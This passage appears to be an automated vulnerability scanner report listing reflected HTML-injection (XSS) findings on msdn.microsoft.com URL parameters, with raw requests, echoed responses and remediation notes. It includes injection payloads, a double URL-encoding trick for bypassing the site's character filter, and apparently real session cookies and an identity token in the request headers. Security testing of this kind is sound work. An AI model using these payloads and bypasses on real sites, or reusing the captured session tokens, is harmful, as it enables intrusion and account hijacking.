HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:55:28 GMT Content-Length: 9197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfeb63"><a>27a0f0d059b/library/dd582938(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58b3%2522%253e%253ca%253ea478026753a was submitted in the REST URL parameter 2. This input was echoed as a58b3"><a>a478026753a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya58b3%2522%253e%253ca%253ea478026753a/dd582938(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:55:59 GMT Content-Length: 9196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya58b3"><a>a478026753a/dd582938(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fd90%2522%253e%253ca%253e989d6e38d2f was submitted in the REST URL parameter 3. This input was echoed as 5fd90"><a>989d6e38d2f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(office.11).aspx5fd90%2522%253e%253ca%253e989d6e38d2f HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:29 GMT Content-Length: 9206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.11).aspx5fd90"><a>989d6e38d2f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75f6%2522%253e%253ca%253e1af47b0d7bc was submitted in the REST URL parameter 1. This input was echoed as d75f6"><a>1af47b0d7bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd75f6%2522%253e%253ca%253e1af47b0d7bc/library/dd582938(v/x3doffice.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9229 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:22 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd75f6"><a>1af47b0d7bc/library/dd582938(v/x3doffice.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0137%2522%253e%253ca%253e0e5c27062dd was submitted in the REST URL parameter 2. This input was echoed as c0137"><a>0e5c27062dd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryc0137%2522%253e%253ca%253e0e5c27062dd/dd582938(v/x3doffice.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9229 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:32 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc0137"><a>0e5c27062dd/dd582938(v/x3doffice.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68427%2522%253e%253ca%253ef797850a81e was submitted in the REST URL parameter 3. This input was echoed as 68427"><a>f797850a81e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v68427%2522%253e%253ca%253ef797850a81e/x3doffice.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v68427"><a>f797850a81e/x3doffice.11" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe24%2522%253e%253ca%253edee8348ee07 was submitted in the REST URL parameter 4. This input was echoed as 5fe24"><a>dee8348ee07 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v/x3doffice.115fe24%2522%253e%253ca%253edee8348ee07 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v/x3doffice.115fe24"><a>dee8348ee07" /> ...[SNIP]...
2.62. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://msdn.microsoft.com
Path: /en-us/library/dd582938(v/x3doffice.11
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92bbc"><a>62955b61670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/library/dd582938(v/x3doffice.11?92bbc"><a>62955b61670=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
